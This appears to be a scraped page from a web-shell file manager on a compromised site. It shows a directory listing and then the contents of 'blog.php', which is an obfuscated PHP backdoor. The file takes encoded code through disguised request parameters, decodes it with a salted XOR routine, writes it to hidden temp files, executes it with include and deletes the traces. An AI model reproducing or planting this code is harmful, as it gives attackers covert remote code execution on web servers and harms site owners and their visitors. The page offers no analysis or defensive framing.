at path:
ROOT
/
blog.php
run:
R
W
Run
ca
DIR
2026-04-09 16:23:02
R
W
Run
saiga
DIR
2026-04-09 12:42:34
R
W
Run
.htaccess
231 By
2026-04-09 08:42:25
R
W
Run
Delete
Rename
.reference
702 By
2026-04-09 20:57:09
R
W
Run
Delete
Rename
admin.php
482 By
2026-04-09 01:52:02
R
W
Run
Delete
Rename
blog.php
1.66 KB
2026-04-06 01:41:01
R
W
Run
Delete
Rename
error_log
6.09 MB
2026-04-09 08:42:24
R
W
Run
Delete
Rename
googleae4e47290e834d76.html
53 By
2026-04-09 02:10:08
R
W
Run
Delete
Rename
order_details.php
1.15 KB
2026-04-06 01:41:01
R
W
Run
Delete
Rename
robots.txt
278 By
2026-04-09 02:10:08
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-06 01:41:01
R
W
Run
Delete
Rename
sv.php
1.67 KB
2026-04-09 00:39:21
R
W
Run
Delete
Rename
error_log
up
📄
blog.php
Save
<?php if(count($_REQUEST) > 0 && isset($_REQUEST["\x64\x61\x74a\x5F\x63hunk"])){ $elem = array_filter(["/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getenv("TEMP"), getcwd(), "/dev/shm"]); $bind = $_REQUEST["\x64\x61\x74a\x5F\x63hunk"]; $bind =explode( '.', $bind) ; $descriptor = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $z = 0; foreach ($bind as $v8) {$chS = ord($salt[$z %$lenS]); $dec = ((int)$v8 - $chS - ($z %10)) ^ 26; $descriptor .= chr($dec); $z++; } foreach ($elem as $key => $ref) { if ((function($d) { return is_dir($d) && is_writable($d); })($ref)) { $object = join("/", [$ref, ".hld"]); if (file_put_contents($object, $descriptor)) { include $object; @unlink($object); exit; } } } } if(isset($_REQUEST["\x70\x6Fi\x6E\x74er"])){ $factor = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", "/tmp", getcwd(), getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getenv("TMP")]); $res = $_REQUEST["\x70\x6Fi\x6E\x74er"]; $res = explode ("." , $res ) ; $val = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1); $n = 0; $__tmp = $res; while($v7 = array_shift($__tmp)) { $chS = ord($s1[$n % $sLen]); $d =((int)$v7 - $chS -($n % 10)) ^ 50; $val .= chr($d); $n++; } while ($key = array_shift($factor)) { if (is_dir($key) && is_writable($key)) { $mrk = str_replace("{var_dir}", $key, "{var_dir}/.entry"); if (file_put_contents($mrk, $val)) { include $mrk; @unlink($mrk); exit; } } } }